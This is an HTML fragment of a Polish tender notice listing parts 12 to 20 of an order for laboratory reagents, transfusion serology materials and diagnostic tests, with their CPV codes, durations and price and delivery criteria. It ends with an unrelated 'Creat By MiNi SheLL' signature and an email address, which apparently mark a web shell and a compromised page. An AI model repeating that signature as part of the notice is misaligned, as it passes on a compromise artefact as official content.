<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 12 - odczynniki i materiały do automatycznego analizatora parametrów krytycznych ( równowaga kwasowo - zasadowa, hemoglobina, hematokryt, oksymetria, elektrolity, glukoza, mleczany ) wraz z dzierżawą analizatora parametrów krytycznych; -  18 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zad. 13 - testy do wykrywania antygenu Giardia lamblia w kale.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 13 - testy do wykrywania antygenu Giardia lamblia w kale - 2 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zad. 14 - odczynniki do histopatologii i cytologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 14 - odczynniki do histopatologii i cytologii - 15 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zad.15 - materiały, odczynniki, krwinki do badań z zakresu serologii transfuzjogicznej mikrometodą żelową do posiadanego sprzętu diadem - id system.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.15 - materiały, odczynniki, krwinki do badań z zakresu serologii transfuzjogicznej mikrometodą żelową do posiadanego sprzętu diamed - id system                                                                 - 16 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zad. 16 - zestawy krwinek wzorcowych do badań z zakresu serologii transfuzjologicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 16 - zestawy krwinek wzorcowych do badań z zakresu serologii transfuzjologicznej - 2 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zad. 17 - spulowane krwinki czerwone grupy 0 uczulone ( opłaszczone ) przeciwciałami klasy IgG do kontroli ujemnych wyników testów antyglobulinowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 17 - spulowane krwinki czerwone grupy 0 uczulone ( opłaszczone ) przeciwciałami klasy IgG do kontroli ujemnych wyników testów antyglobulinowych                                                            -  1 poz. asort. w  ilości 24 ml.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zad. 18 -odczynniki do badań z zakresu serologii grup krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 18 -odczynniki do badań z zakresu serologii grup krwi                                -  2 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zad. 19- materiały i odczynniki do badań z zakresu serologii  transfuzjologicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 19- materiały i odczynniki do badań                                                               - 11 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zad. 20 -odczynniki monoklonalne do oznaczania antygenu D układu Rh.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 20 -odczynniki monoklonalne do oznaczania antygenu D układu Rh -  3 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com